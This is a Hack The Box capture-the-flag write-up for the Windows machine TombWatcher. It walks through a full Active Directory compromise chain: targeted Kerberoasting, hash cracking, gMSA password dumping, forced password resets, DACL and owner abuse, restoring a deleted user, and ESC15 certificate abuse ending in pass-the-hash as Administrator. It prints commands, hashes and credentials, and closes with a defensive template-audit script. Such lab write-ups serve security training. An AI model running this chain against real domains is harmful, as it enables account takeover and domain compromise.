TombWatcher Medium Machine - Hack the Box

Medium-level Windows machine from Season 8.

Information

TombWatcher Machine is a medium-level Windows machine from Season 8.
As is common in real-life Windows pentests, you start this box with credentials for the following account:
henry / H3nry_987TGV!

Tools

  • nmap
  • hashcat
  • bloodhound
  • certipy
  • evil-winrm
  • targetedKerberoast
  • bloodyAD

In some of the next steps we may get a “Clock skew too great” error. Kerberos rejects requests whose timestamp is too far from the KDC's clock, so the time gap between the target and our machine breaks Kerberos authentication.
To fix it, stop NTP and sync our clock with the DC:

timedatectl set-ntp off
ntpdate 10.10.11.72

Step by step

  1. Start with Nmap enum:
    nmap -A -p- -T4 -v -P0 -oX tombwatcher_tcp.scan 10.10.11.72 --webxml
    
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        Simple DNS Plus
    80/tcp    open  http          Microsoft IIS httpd 10.0
    |_http-title: IIS Windows Server
    | http-methods:
    |   Supported Methods: OPTIONS TRACE GET HEAD POST
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-08 20:07:39Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
    |_ssl-date: 2025-06-08T20:09:14+00:00; +4h00m00s from scanner time.
    | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
    | Issuer: commonName=tombwatcher-CA-1
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha1WithRSAEncryption
    | Not valid before: 2024-11-16T00:47:59
    | Not valid after:  2025-11-16T00:47:59
    | MD5:   a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
    |_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
    445/tcp   open  microsoft-ds?
    464/tcp   open  kpasswd5?
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
    |_ssl-date: 2025-06-08T20:09:13+00:00; +3h59m59s from scanner time.
    | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
    | Issuer: commonName=tombwatcher-CA-1
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha1WithRSAEncryption
    | Not valid before: 2024-11-16T00:47:59
    | Not valid after:  2025-11-16T00:47:59
    | MD5:   a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
    |_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
    | Issuer: commonName=tombwatcher-CA-1
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha1WithRSAEncryption
    | Not valid before: 2024-11-16T00:47:59
    | Not valid after:  2025-11-16T00:47:59
    | MD5:   a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
    |_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
    |_ssl-date: 2025-06-08T20:09:14+00:00; +4h00m00s from scanner time.
    3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
    |_ssl-date: 2025-06-08T20:09:13+00:00; +3h59m59s from scanner time.
    | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
    | Issuer: commonName=tombwatcher-CA-1
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha1WithRSAEncryption
    | Not valid before: 2024-11-16T00:47:59
    | Not valid after:  2025-11-16T00:47:59
    | MD5:   a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
    |_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
    5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-title: Not Found
    |_http-server-header: Microsoft-HTTPAPI/2.0
    9389/tcp  open  mc-nmf        .NET Message Framing
    49667/tcp open  msrpc         Microsoft Windows RPC
    49683/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    49684/tcp open  msrpc         Microsoft Windows RPC
    49685/tcp open  msrpc         Microsoft Windows RPC
    49704/tcp open  msrpc         Microsoft Windows RPC
    49710/tcp open  msrpc         Microsoft Windows RPC
    49740/tcp open  msrpc         Microsoft Windows RPC
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
    OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
    Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=258 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    | smb2-time:
    |   date: 2025-06-08T20:08:33
    |_  start_date: N/A
    | smb2-security-mode:
    |   3:1:1:
    |_    Message signing enabled and required
    |_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
    
    TRACEROUTE (using port 135/tcp)
    HOP RTT       ADDRESS
    1   145.88 ms 10.10.14.1
    2   146.27 ms 10.10.11.72
    

    Port 80 only serves the default IIS landing page; there is nothing useful there.

  2. The provided credentials do not give us a WinRM shell, and the user has no SMB shares from which to start our research.
    We can, however, collect domain information with BloodHound:

    bloodhound-python -d TOMBWATCHER.HTB -u henry -p 'H3nry_987TGV!' -gc dc01.tombwatcher.htb -c all -ns 10.10.11.72
    

    Looking through BloodHound we find a chain of relationships that starts at our user “Henry” and ends at the user “JOHN”, the first account with remote access privileges.
    The first edge to exploit is this one: the user Henry has “WriteSPN (Service Principal Name)” over the user Alfred.
    With that right we can add an SPN to Alfred and then request a service ticket for it, which gives us a crackable hash. This is known as Targeted Kerberoasting.

    python3 targetedKerberoast.py -u henry -p 'H3nry_987TGV!' --dc-ip 10.10.11.72 -d tombwatcher.htb
    
    [*] Starting kerberoast attacks
    [*] Fetching usernames from Active Directory with LDAP
    [+] Printing hash for (Alfred)
    $krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$78bdc1efa1535788769f12d46881abfe$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
    
  3. Now, we can try to crack the hash:
    hashcat alfred_hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
    

    Password obtained: basketball.
    With this new credential we can continue along the chain: the user Alfred has “AddSelf” over the group INFRASTRUCTURE.
    This right lets Alfred add himself to the group INFRASTRUCTURE.

  4. Add Alfred to the group with bloodyAD:

    bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "alfred"
    

    Next edge: the group INFRASTRUCTURE has “ReadGMSAPassword” over ANSIBLE_DEV$ (a Group Managed Service Account).
    BloodHound explains the abuse as follows:
    Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is managed by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).
    The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.

    python3 gMSADumper.py -u alfred -p basketball -d tombwatcher.htb
    
    Users or groups who can read password for ansible_dev$:
    > Infrastructure
    ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
    ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
    ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a
    
  5. Using the NT hash we just obtained, we move on to the next edge: ANSIBLE_DEV$ has ForceChangePassword over the user SAM.
    As the name suggests, this lets us reset SAM's password:

    bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "ANSIBLE_DEV$" -p :1c37d00093dc2a5f25176bf2d474afdc set password "sam" "Test1234."
    
  6. Finally, with the user SAM we can take control of the user JOHN: SAM has WriteOwner over John.
    Taking ownership grants the implicit owner rights, which we then use to write a FullControl ACE for ourselves:

    impacket-owneredit -action write -new-owner 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'
    impacket-dacledit -action 'write' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'
    

    Then, we can force change the password:

    bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "sam" -p "Test1234." set password "john" "Test1234."
    

    Optionally, but recommended, we remove the ACE we added:

    impacket-dacledit -action 'remove' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'
    
    JOHN's new credentials now give us a WinRM shell:

    evil-winrm -i 10.10.11.72 -u john -p 'Test1234.'
    

:trophy: USER FLAG PWNED :trophy:

Now, for privilege escalation, things get a bit tricky.
Inspecting the user JOHN, we see that he has GenericAll over the ADCS Organizational Unit. That may not look useful at first, but it grants broad control over every object inside that OU, which opens up several possible attack paths.

  1. At first glance, running Certipy doesn’t reveal any templates marked as vulnerable. However, with a closer look, we can find something suspicious:
    certipy-ad find -u john@tombwatcher.htb -p 'Test1234.' -dc-ip 10.10.11.72 -stdout
    
    7
     Template Name                       : WebServer
     Display Name                        : Web Server
     Certificate Authorities             : tombwatcher-CA-1
     Enabled                             : True
     Client Authentication               : False
     Enrollment Agent                    : False
     Any Purpose                         : False
     Enrollee Supplies Subject           : True
     Certificate Name Flag               : EnrolleeSuppliesSubject
     Extended Key Usage                  : Server Authentication
     Requires Manager Approval           : False
     Requires Key Archival               : False
     Authorized Signatures Required      : 0
     Schema Version                      : 1
     Validity Period                     : 2 years
     Renewal Period                      : 6 weeks
     Minimum RSA Key Length              : 2048
     Template Created                    : 2024-11-16T00:57:49+00:00
     Template Last Modified              : 2024-11-16T17:07:26+00:00
     Permissions
       Enrollment Permissions
         Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                           TOMBWATCHER.HTB\Enterprise Admins
                                           S-1-5-21-1392491010-1358638721-2126982587-1111
       Object Control Permissions
         Owner                           : TOMBWATCHER.HTB\Enterprise Admins
         Full Control Principals         : TOMBWATCHER.HTB\Domain Admins
                                           TOMBWATCHER.HTB\Enterprise Admins
         Write Owner Principals          : TOMBWATCHER.HTB\Domain Admins
                                           TOMBWATCHER.HTB\Enterprise Admins
         Write Dacl Principals           : TOMBWATCHER.HTB\Domain Admins
                                           TOMBWATCHER.HTB\Enterprise Admins
         Write Property Enroll           : TOMBWATCHER.HTB\Domain Admins
                                           TOMBWATCHER.HTB\Enterprise Admins
                                           S-1-5-21-1392491010-1358638721-2126982587-1111
    

    Looking at the Permissions section, we see S-1-5-21-1392491010-1358638721-2126982587-1111 listed as a principal. The SID is not resolved to a human-readable name, which usually means the object it belonged to (a user or group) has been deleted from Active Directory. That points to a misconfiguration or an orphaned privilege still present on the template: if the SID belonged to a formerly vulnerable user, it could be leveraged for privilege escalation or abuse of certificate enrollment.

  2. With that information, and guided by the machine name (TombWatcher), we can check the Active Directory Recycle Bin from our shell on the host for deleted users. We should find a deleted user whose SID matches the one in the certificate template permissions:

    Get-ADObject -Filter 'IsDeleted -eq $true' -IncludeDeletedObjects -Properties *
    
    CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                   DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
    CN                              : cert_admin
                                     DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
    codePage                        : 0
    countryCode                     : 0
    Created                         : 11/16/2024 12:07:04 PM
    createTimeStamp                 : 11/16/2024 12:07:04 PM
    Deleted                         : True
    Description                     :
    DisplayName                     :
    DistinguishedName               : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
    dSCorePropagationData           : {11/16/2024 12:07:10 PM, 11/16/2024 12:07:08 PM, 12/31/1600 7:00:00 PM}
    givenName                       : cert_admin
    instanceType                    : 4
    isDeleted                       : True
    LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
    lastLogoff                      : 0
    lastLogon                       : 0
    logonCount                      : 0
    Modified                        : 11/16/2024 12:07:27 PM
    modifyTimeStamp                 : 11/16/2024 12:07:27 PM
    msDS-LastKnownRDN               : cert_admin
    Name                            : cert_admin
                                     DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
    nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
    ObjectCategory                  :
    ObjectClass                     : user
    ObjectGUID                      : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
    objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1111
    primaryGroupID                  : 513
    ProtectedFromAccidentalDeletion : False
    pwdLastSet                      : 133762504248946345
    sAMAccountName                  : cert_admin
    sDRightsEffective               : 7
    sn                              : cert_admin
    userAccountControl              : 66048
    uSNChanged                      : 13197
    uSNCreated                      : 13186
    whenChanged                     : 11/16/2024 12:07:27 PM
    whenCreated                     : 11/16/2024 12:07:04 PM
    

    Another key detail is that the cert_admin user was originally located in the ADCS OU, over which we have control.

  3. Now, we can restore the deleted user and reset their password for further exploitation:
    Restore-ADObject -Identity "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"
    Set-ADAccountPassword -Identity "cert_admin" -Reset -NewPassword (ConvertTo-SecureString "Test1234." -AsPlainText -Force)
    

    With the restored account, we can rerun Certipy to check if we now have access to a vulnerable certificate template.

  4. Run the vulnerable-template check as cert_admin:

    certipy-ad find -vulnerable -u cert_admin@tombwatcher.htb -p 'Test1234.' -dc-ip 10.10.11.72 -stdout
    

    This time, the WebServer template, which was not previously marked as vulnerable, is now identified as vulnerable:

    Certificate Templates
    0
       Template Name                       : WebServer
       Display Name                        : Web Server
       Certificate Authorities             : tombwatcher-CA-1
       Enabled                             : True
       Client Authentication               : False
       Enrollment Agent                    : False
       Any Purpose                         : False
       Enrollee Supplies Subject           : True
       Certificate Name Flag               : EnrolleeSuppliesSubject
       Extended Key Usage                  : Server Authentication
       Requires Manager Approval           : False
       Requires Key Archival               : False
       Authorized Signatures Required      : 0
       Schema Version                      : 1
       Validity Period                     : 2 years
       Renewal Period                      : 6 weeks
       Minimum RSA Key Length              : 2048
       Template Created                    : 2024-11-16T00:57:49+00:00
       Template Last Modified              : 2024-11-16T17:07:26+00:00
       Permissions
          Enrollment Permissions
          Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                              TOMBWATCHER.HTB\Enterprise Admins
                                              TOMBWATCHER.HTB\cert_admin
          Object Control Permissions
          Owner                           : TOMBWATCHER.HTB\Enterprise Admins
          Full Control Principals         : TOMBWATCHER.HTB\Domain Admins
                                              TOMBWATCHER.HTB\Enterprise Admins
          Write Owner Principals          : TOMBWATCHER.HTB\Domain Admins
                                              TOMBWATCHER.HTB\Enterprise Admins
          Write Dacl Principals           : TOMBWATCHER.HTB\Domain Admins
                                              TOMBWATCHER.HTB\Enterprise Admins
          Write Property Enroll           : TOMBWATCHER.HTB\Domain Admins
                                              TOMBWATCHER.HTB\Enterprise Admins
                                              TOMBWATCHER.HTB\cert_admin
       [+] User Enrollable Principals      : TOMBWATCHER.HTB\cert_admin
       [!] Vulnerabilities
          ESC15                             : Enrollee supplies subject and schema version is 1.
       [*] Remarks
          ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
    
  5. Finally, we exploit the ESC15 vulnerability.
    Note: according to the Certipy wiki, we need to follow Scenario B. If we mistakenly follow Scenario A, we end up with an ldap_shell, which is not useful in this case.

    # Step 1: Request a certificate using the vulnerable template with the Certificate Request Agent policy
    certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Test1234.' -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -application-policies 'Certificate Request Agent'
    
    # Step 2: Use that certificate to request another one on behalf of the domain admin
    certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Test1234.' -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'User' -pfx 'cert_admin.pfx' -on-behalf-of 'TOMBWATCHER\Administrator'
    
    # Step 3: Authenticate using the obtained certificate
    certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72'
    
    The Administrator NT hash returned by certipy auth gives us a shell:

    evil-winrm -i 10.10.11.72 -u Administrator -H f61db423bebe3328d33af26741afe5fc
    

:trophy: ROOT FLAG PWNED :trophy:
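As an added defender-side example (my code, not part of the original write-up), the following Python parses the plain-text certipy-ad find -stdout output from steps 1 and 4 and flags the two conditions this escalation relied on: a bare, unresolved SID in a template's permission lists (the orphaned cert_admin ACE) and templates meeting the ESC15 precondition certipy itself reports. The sample input is a trimmed copy of the WebServer listing above; the function names are my own.

```python
import re

# Constructed sample: a trimmed copy of the certipy-ad find output shown above
# for the WebServer template; only the fields the checks below need are kept.
SAMPLE = r"""Certificate Templates
  0
    Template Name                       : WebServer
    Enabled                             : True
    Client Authentication               : False
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Schema Version                      : 1
    Permissions
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          S-1-5-21-1392491010-1358638721-2126982587-1111
      Object Control Permissions
        Owner                           : TOMBWATCHER.HTB\Enterprise Admins
        Write Property Enroll           : TOMBWATCHER.HTB\Domain Admins
                                          S-1-5-21-1392491010-1358638721-2126982587-1111
"""

# A domain SID printed bare (not as DOMAIN\name) is one the tool could not resolve.
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-\d+$")
# "Key   : value" lines; the lazy key stops at the first colon.
FIELD_RE = re.compile(r"^\s*(?P<key>[A-Za-z][A-Za-z ]*?)\s*:\s*(?P<val>.*)$")

def parse_templates(text):
    """Parse 'certipy-ad find -stdout' text into {template: {field: [values]}}.
    Lines indented past the last key continue its principal list; any other
    unmatched line (a section header, the next template index) resets that."""
    templates, current, last_key, key_indent = {}, None, None, 0
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        indent = len(line) - len(line.lstrip())
        m = FIELD_RE.match(line)
        if m and m.group("key") == "Template Name":
            current = templates.setdefault(m.group("val").strip(), {})
            last_key = None
        elif m and current is not None:
            val = m.group("val").strip()
            current[m.group("key")] = [val] if val else []
            last_key, key_indent = m.group("key"), indent
        elif current is not None and last_key and indent > key_indent:
            current[last_key].append(stripped)
        else:
            last_key = None
    return templates

def unresolved_principals(template):
    """Bare SIDs in any field: usually an orphaned ACE left by a deleted object."""
    return sorted({v for vals in template.values() for v in vals if SID_RE.match(v)})

def esc15_candidates(templates):
    """Templates matching the ESC15 precondition certipy reports (CVE-2024-49019):
    enabled, schema version 1, enrollee supplies the subject."""
    return sorted(name for name, t in templates.items()
                  if t.get("Enabled") == ["True"]
                  and t.get("Schema Version") == ["1"]
                  and t.get("Enrollee Supplies Subject") == ["True"])

def audit(text):
    """Run both checks over one certipy dump and return the findings."""
    templates = parse_templates(text)
    orphans = {n: unresolved_principals(t) for n, t in templates.items()}
    return {"esc15": esc15_candidates(templates),
            "orphaned_sids": {n: s for n, s in orphans.items() if s}}
```

Run audit() over a full certipy dump of your own CA: any template that shows up under orphaned_sids deserves an ACL cleanup, and an esc15 hit on an unpatched CA is the condition step 5 abused.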

This post is licensed under CC BY 4.0 by the author.